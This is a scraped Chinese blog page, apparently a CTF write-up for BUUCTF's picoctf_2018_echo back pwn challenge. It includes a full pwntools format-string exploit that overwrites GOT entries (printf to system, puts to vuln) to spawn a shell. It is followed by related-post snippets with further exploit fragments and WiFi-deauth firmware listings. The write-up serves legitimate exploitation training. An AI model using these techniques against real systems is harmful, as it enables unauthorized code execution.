[BUUCTF-pwn]——picoctf_2018_echo back

最新推荐文章于 2022-04-26 16:54:24 发布
最新推荐文章于 2022-04-26 16:54:24 发布
阅读量429 收藏
点赞数 2
分类专栏: # BUUCTF # 格式化字符串
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Y_peak/article/details/115418499
版权
该篇博客介绍了如何通过利用PicoCTF_2018_echoback挑战中的printf_got和puts_got地址,实现对system函数的间接调用,从而完成shellcode执行。作者提到尝试使用fini_array未果,最终选择put的got表进行攻击。详细展示了payload的构造和交互过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

[BUUCTF-pwn]——picoctf_2018_echo back

和之前的一道题及其类似大家可以对比一下[BUUCTF-pwn]——ciscn_2019_sw_1

思路都是一样的就是将printf_got修改为system_plt表,然后循环调用就好
在这里插入图片描述
找偏移, 为7
在这里插入图片描述
在这里插入图片描述

不过有点难受的是, 不知道为什么利用fini_array不行,那里错了也不知道,没办法只有利用put的got表了。

exploit

from pwn import*
p=remote('node3.buuoj.cn',27945)
#p = process('./PicoCTF_2018_echo_back')
#gdb.attach(p, 'b printf')
printf_got = 0x0804A010
sys_plt = 0x08048460
puts_got = 0x0804A01C
vuln = 0x080485AB
fini = 0x08049F0C
offset = 7

payload = p32(puts_got + 2) + p32(printf_got+2) + p32(printf_got) + p32(puts_got)
payload += '%' + str(0x0804 - 0x10) + 'c%7$hn'
payload += '%8$hn'
payload += '%' + str(0x8460 - 0x0804) + 'c%9$hn'
payload += '%' + str(0x85AB - 0x8460) + 'c%10$hn'

p.recvuntil('message:\n')
p.send(payload)

p.recvuntil('message:\n')
p.sendline('/bin/sh\x00')

p.interactive()
攻防世界-PWN进阶区-echo_back(CISCN-2018-Quals)
weixin_44145820的博客
03-03 892
本题考查的是对格式化字符串漏洞的利用以及修改_IO_2_1_stdin来实现任意写 题目分析 checksec: 发现保护全开 源码分析: echo函数: 在该函数中有明显的格式化字符串漏洞,但是格式化字符串的长度有限制,最长只能为7,这使得许多利用格式化字符串进行任意内存写的方式不能使用,不过泄露信息还是能够做到的 对于信息泄露,首先我们需要获取libc的基地址,这样我们才能计算system...
BUUCTF-pwn2_sctf_2016
weixin_44145820的博客
03-06 1097
这题利用的是负数转无符号数造成缓冲区溢出,以及泄露libc基地址执行ROP 题目分析 由于NX开启,我们考虑使用ROP,Canary没有打开使得这题变得很方便 下面是vuln函数: 在该函数中,程序读入一个字符串并转化为带符号整形(signed int),这时,如果我们输入负数可以避开不能大于32的检查 在get_n函数中,读入长度被强制转换为unsigned int,此时-1变成了42949...
[BUUCTF] picoctf_2018_echo back
zyxx_wjc的博客
03-15 2916
BUUCTF picoctf_2018_echo back
BUUCTFPicoCTF_2018_echo_back】(格式化字符串)
weixin_51055545的博客
04-26 483
文章目录PicoCTF_2018_echo_back例行检查:IDA分析:exp: PicoCTF_2018_echo_back 例行检查: 开了部分relro,没开pie, IDA分析: 函数主逻辑在vul()函数中: 先打印出一句话,然后让我们输入,大小控制在0x7f,然后很明显一个格式化字符串,然后下边直接puts完后,程序结束. 程序中存在system,并且没开pie,这里我们考虑直接改got表,我选择的是改printf()_got为system_plt,下边程序直接结束了,这里我们没办法去输入
picoctf_2018_echo back
z1r0的博客
03-27 493
picoctf_2018_echo back 查看保护 有个格式化漏洞 攻击思路:利用格式化将printf_got改为system,但是只有一次,所以我们可以改fini段,或者将下面的puts_got改成vuln让程序继续运行一下,这样就可以输入/bin/sh来getshell了 from pwn import * context(arch='i386', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug:
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
[BUUCTF]PWN-wdb_2018_3rd_soEasy
红凳子的博客
05-07 513
[BUUCTF]PWN-wdb_2018_3rd_soEasy前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、pandas是什么? 二、使用步骤 1.引入库 代码如下(示例): import numpy as np import pandas as pd impo
BUUCTF-Pwn-get_started_3dsctf_2016
餐桌上的猫
03-04 248
题目截图
miniSpirit.github.io
03-31
miniSpirit.github.io
picoctf_2018_echooo
doudoudedi
09-23 557
发现是简单的32位格式化字符串但是并且flag存了栈上,直接泄漏就行了,但是内存是小端存储的,所以倒序输出即可 exp: from pwn import * #p=process('./PicoCTF_2018_echooo') p=remote('node3.buuoj.cn',26798) offset=11 flag='' for i in range(27,27+11): payload='%{}$p'.format(str(i)) p.sendlineafter('> ',p
[XCTF-pwn] 24_ciscn-2018-Quals-echo_back
weixin_52640415的博客
03-08 328
格式化字符串漏洞,输入长度受限,劫持_IO_2_1_stdin_读入payload unsigned __int64 __fastcall echo_back(const char *a1) { size_t nbytes; // [rsp+1Ch] [rbp-14h] BYREF unsigned __int64 v3; // [rsp+28h] [rbp-8h] v3 = __readfsqword(0x28u); memset((char *)&nbytes + 4, 0
CISCN-2018-Quals note-service2
qq_41071646的博客
07-23 1017
这几天看 wiki 有点头疼 刷会 攻防世界 (那个echo_back 真的头疼 那个 文件结构 不知道是怎么搞出来的) 哪一行代码也不是很清楚是怎么做的 于是就直接跳过那个题目了 note-service2 这个题用ida 分析的时候 看见 show 不能用 笑容 逐渐 凝固 看见edit 不能用的时候 直接关闭了ida 然后发现保护如下 shellcode 一把梭鸭 ...
攻防世界PWNecho_back题解
seaaseesa的博客
11-17 2752
echo_back 首先,检查一下程序的保护机制,发现保护全开 然后,我们用IDA分析一下, 在功能2有一个明显的格式化输出字符串漏洞 但是,我们能够输入的字符串长度最多为7个字符 好啦,不管怎么说,首先得用这个漏洞泄露一些地址 当我们要执行printf时,我们发现,距离当前栈顶13个位置处,有__libc_start_main+F0的地址,但是,这不是说要输出它的值...
[BUUCTF-pwn]——warmup_csaw_2016
Y_peak的博客
01-30 4966
BUUCTF——warmup_csaw_2016 题目地址:https://buuoj.cn/challenges 题目: 管他三七二十一,先将文件下载下来再说。老规矩,现在Linux上用checksec看看文件。64位,Stack、NX、PIE都没有开,应该是栈溢出的题。 赶快 go go go 去window 上用IDA反汇编看看,看到返回的是gets函数,一个典型的可以利用栈溢出覆盖的地方。其他没什么有用的信息。 按Shift + F12,看一下字符串。不看不知道一看有惊喜。cat flag.
[BUUCTF-pwn]——ciscn_2019_n_3
Y_peak的博客
11-20 3202
[BUUCTF-pwn]——ciscn_2019_n_3 结构体: //该结构体仅仅是选择字符串的时候的结构体 struct chunk { void *rec_str_print(); void *rec_str_free(); char *str; } //该结构体仅仅是选择数字的时候的结构体 struct chunk { void *rec_int_print(); void *rec_int_free(); int number; } 这道题目就是简单的u
[BUUCTF-pwn]——ciscn_2019_n_8
Y_peak的博客
02-10 2591
[BUUCTF-pwn]——ciscn_2019_n_8 题目地址:https://buuoj.cn/challenges#ciscn_2019_n_8 题目 上去checksec一下,吓一跳保护基本全开了。 在IDA中一看,开心了。如此简单 只需要v[13] ==17 就好。因为var是以字符串的形式输入的。所以exploit如下: exploit from pwn import * p = remote("node3.buuoj.cn",29772) p.sendline("aaaa"*13 +
[BUUCTF-pwn]——jarvisoj_level0
Y_peak的博客
01-31 2337
[BUUCTF-pwn]——jarvisoj_level0 题目地址:https://buuoj.cn/challenges#jarvisoj_level0 题目: 还是先下载下来在Linux上checksex一下,基本确实又是栈溢出了。 64位,所以我们用64位的IDA打开,没什么有用的信息,点开vulnerable_function函数 发现栈溢出的read函数,前面为0意味着标准读入,后面的长度也可以。没毛病就是这个地方了。 再翻翻其他函数,发现了我们想要的system函数。找到位置,和需要覆
buuctf-pwn入门
最新发布
01-26
### BUUCTF PWN 类题目入门教程 #### 学习资源推荐 对于希望进入PWN挑战领域的新手来说,选择合适的教材和平台至关重要。王爽老师的《汇编语言》提供了基础理论支持,有助于理解底层操作原理[^1]。此外,《IDA Pro...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值